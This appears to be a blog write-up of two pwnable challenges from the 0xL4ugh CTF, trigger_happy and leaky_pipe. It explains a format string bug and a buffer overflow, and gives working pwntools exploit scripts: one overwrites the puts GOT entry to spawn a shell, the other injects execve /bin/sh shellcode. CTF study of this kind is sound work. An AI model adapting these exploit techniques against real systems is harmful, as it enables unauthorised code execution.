![[0xL4ugh CTF] Only Pwnable Writeup](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fq4u5Y%2FbtqTSTM1NqH%2FfuxEe04UcDjM6KzKHphkr0%2Fimg.png)
Pwn - trigger_happy
There is no security check..
Main function calls response function.
There is a vulnerability in this function.
FSB(Format string bug) occurs in printf(&s).
We have to change puts to flaggy(/bin/sh function) function.
from pwn import *
context.log_level = 'debug'
p = remote('ctf.0xl4ugh.com', 1337)
e = ELF('./trigger_happy')
#flaggy = e.symbols['flaggy']
payload = fmtstr_payload(4, {e.got['puts']:e.symbols['flaggy']})
p.sendlineafter('CTF', payload)
p.interactive()Pwn - leaky_pipe
...? There's only PIE.
This binary file created in C++.
There is a vulnerability in main function.
Simple BOF(Buffer overflow) occurs in read(0, &buf, 0x40uLL).
This program gives us a stack address, so we can exploit using a shellcode.
from pwn import *
context.log_level = 'debug'
p = remote('ctf.0xl4ugh.com', 4141)
shellcode = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"
p.recvuntil('here... ')
leak = int(p.recv(14), 16)
payload = shellcode + 'A' * 9 + p64(leak)
p.recvline()
p.send(payload)
p.interactive()'CTF Write-Up' 카테고리의 다른 글
| [UTCTF 2021] Partial Writeup (0) | 2021.03.15 |
|---|---|
| [zer0pts CTF 2021] Partial Writeup (2) | 2021.03.07 |
| [TrollCat CTF] Only Pwnable WriteUp (0) | 2021.02.07 |
| [0x41414141 CTF] Only Pwnable Writeup (2) | 2021.01.25 |
| [FIESTA 2020] N0Named Team(bjloed) Write-Up(일부, 수정중단) (0) | 2020.09.07 |